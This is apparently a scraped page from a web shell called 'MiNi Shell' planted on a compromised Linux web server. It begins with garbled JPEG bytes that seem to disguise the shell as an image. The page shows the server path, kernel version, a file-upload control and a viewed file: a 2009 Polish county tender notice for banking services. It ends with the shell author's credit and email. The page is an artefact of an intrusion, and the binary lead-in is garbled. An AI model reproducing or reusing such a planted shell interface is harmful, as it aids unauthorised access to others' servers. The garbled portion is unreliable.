JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/41203-N-2009.html

<p class="kh_header"><b>Mikołów: Usługi finansowe polegające na prowadzeniu bankowej obsługi budżetu Powiatu Mikołowskiego i podległych mu jednostek.</b><br>
<b>Numer ogłoszenia: 41203 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.mikolow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.sp.mikolow.bipgov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi finansowe polegające na prowadzeniu bankowej obsługi budżetu Powiatu Mikołowskiego i podległych mu jednostek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór Banku na prowadzenie bankowej obsługi budżetu Powiatu Mikołowskiego i podlegających mu następujących jednostek organizacyjnych :
-Starostwo Powiatowe w Mikołowie ( w tym Pracownicza Kasa Zapomogowo - Pożyczkowa ) ;
-I Liceum Ogólnokształcące im. Karola Miarki w Mikołowie ;
-II Liceum Ogólnokształcące w Mikołowie ;
-Zespół Szkół Technicznych w Mikołowie ;
-Zespół Szkół Technicznych Warsztaty Szkolne w Mikołowie ;
-Zespół Szkół Nr 2 Specjalnych w Mikołowie; 
-Poradnia Psychologiczno - Pedagogiczna w Mikołowie ;
-Ognisko Pracy Pozaszkolnej w Mikołowie ;
-Komenda Powiatowa Państwowej Straży Pożarnej w Mikołowie ;
-Gospodarstwo Pomocnicze przy Starostwie Powiatowym w Mikołowie Referat Obsługi Powiatowego Ośrodka Dokumentacji Geodezyjno - Kartograficznej 
-Zespół Szkół Ponadgimnazjalnych w Łaziskach Górnych ;
-Powiatowe Centrum Pomocy Rodzinie ;
-Powiatowy Inspektorat Nadzoru Budowlanego ;
-Powiatowy Urząd Pracy ;
-Powiatowy Zarząd Dróg ;
-Zespół Szkół Ponadgimnazjalnych w Ornontowicach ;
-Dom Dziecka w Orzeszu ;
-Dom Pomocy Społecznej w Orzeszu ;
-Zespół Szkół Nr 1 Specjalnych w Mikołowie ;
W zakres przedmiotu zamówienia wchodzi w szczególności:
-otwarcie i prowadzenie rachunku bankowego budżetu powiatu oraz rachunków bankowych jednostek powiatowych ( głównych i pomocniczych) 
-realizowanie poleceń  przelewów krajowych i zagranicznych,
-przyjmowanie wpłat gotówkowych i dokonywanie wypłat gotówkowych,
-instalacja bankowości elektronicznej  umożliwiającej  dokonywanie przelewów i uzyskiwanie informacji o stanie rachunku na jednym stanowisku komputerowym  w siedzibie Zamawiającego oraz w siedzibie jednostek organizacyjnych wraz z bezpłatnym szkoleniem, serwisem i aktualizacją systemu;
-naliczanie odsetek od środków pieniężnych zgromadzonych na rachunkach bankowych na warunkach określonych w ofercie, na ostatni dzień każdego miesiąca,
-zapewnienie przez bank wypłaty w kasie banku, świadczeń dla osób bezrobotnych, które nie posiadają rachunków bankowych, w trzech terminach w ciągu miesiąca na podstawie list wypłat przedłożonych przez Powiatowy Urząd Pracy,
-uruchomienie na wniosek Zamawiającego kredytu w rachunku bieżącym bez dodatkowych formalności,
-możliwość otwarcia i prowadzenia rachunków walutowych,
-automatyczne lokowanie środków zgodnie ze stanem środków na rachunku bankowym podstawowym, bez limitu w systemie overnight oraz weekendowym,
-zapewnienie obsługi kasowej przez bank w dniach od poniedziałku do piątku w godzinach 9:00 do 17:00.
-bezpłatne wydawanie opinii, zaświadczeń oraz historii rachunków bankowych na wniosek Zamawiającego.
Wykonawca musi posiadać oddział lub filię banku na terenie miasta Mikołowa lub otworzyć filię/oddział w terminie umożliwiającym prawidłową realizację przedmiotu zamówienia. Wykonawca musi złożyć oświadczenie w formularzu ofertowym ( zał. nr 1 do SIWZ, pkt.6)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0, 66.11.00.00-4, 66.11.20.00-8, 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zmian.),
c)spełniają warunki określone w art. 22 ust. 1 Ustawy z dnia 29.01.2004r. Prawo zamówień publicznych,

Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania i odrzuceniem oferty.
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w pkt. 17 SIWZ i zostanie przeprowadzona zgodnie  z formułą - spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą musi złożyć następujące  dokumenty i oświadczenia konieczne do przeprowadzenia postępowania oraz potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu: 
 a) wypełniony i podpisany formularz ofertowy wraz z oświadczeniami z art. 22 ust.1 (na załączonym druku nr 1),
b)wypełniony  i podpisany   załącznik  nr 2 do SIWZ;
c)wypełniony i podpisany załącznik nr 3 do SIWZ; 
d)zezwolenie właściwego organu ( Prezes NBP / Komisja Nadzoru Bankowego) na wykonywanie czynności bankowych , o którym mowa w ustawie Prawo bankowe;  
e)aktualny odpis z właściwego rejestru lub aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej; 
Uwaga! Z dokumentów określonych w pkt. 17 ppkt. e) musi wynikać zakres działalności wykonawcy, sposób reprezentacji wykonawcy na zewnątrz oraz składania oświadczeń woli w jego imieniu. Dokument określony w pkt. 17 ppkt. e) SIWZ uważa się za aktualny jeżeli został wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
f) aktualne zaświadczenie właściwego naczelnika  urzędu skarbowego potwierdzające, że wykonawca  nie zalega z opłacaniem podatków, opłat lub że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu;
g) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega  z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Uwaga! Zaświadczenie z urzędu skarbowego i ZUS uważa się za aktualne jeżeli zostało wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.
Oferta zostanie odrzucona, gdy wystąpi jedna z okoliczności przewidzianych w art. 89 ust. 1 ustawy Prawo zamówień publicznych.
Uwaga !  Dokumenty określone w pkt. 17 należy składać w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.  W przypadku złożenia dokumentów jako  kopii,  należy  na  tym   dokumencie wprowadzić zapis:  potwierdzam za zgodność z oryginałem , datę potwierdzenia  kopii i podpis wykonawcy.
Wszystkie dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski  poświadczonym przez wykonawcę.
Postanowienia dotyczące wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
1. jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, w miejsce dokumentów o których mowa w pkt. 17 ppkt. e,f,g,  składa dokumenty wystawione w  kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.                          

2.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - oprocentowanie środków na rachunkach powiatu - 10</li>
<li>3 - oprocentowanie środków na lokatach overnight - 5</li>
<li>4 - oprocentowanie środków na lokatach weekendowych - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sp.mikolow.bipgov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul.Żwirki i Wigury 4a, 43-190 Mikołów, wejście B, biuro podawcze; osobiście lub  za zaliczeniem pocztowym, cena: 10 zł plus koszt przesyłki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 09:00, miejsce: Starostwo Powiatowe ul. Żwirki i Wigury 4a, 43-190 Mikołów, wejście A, I piętro, pokój 211 - kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 04.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com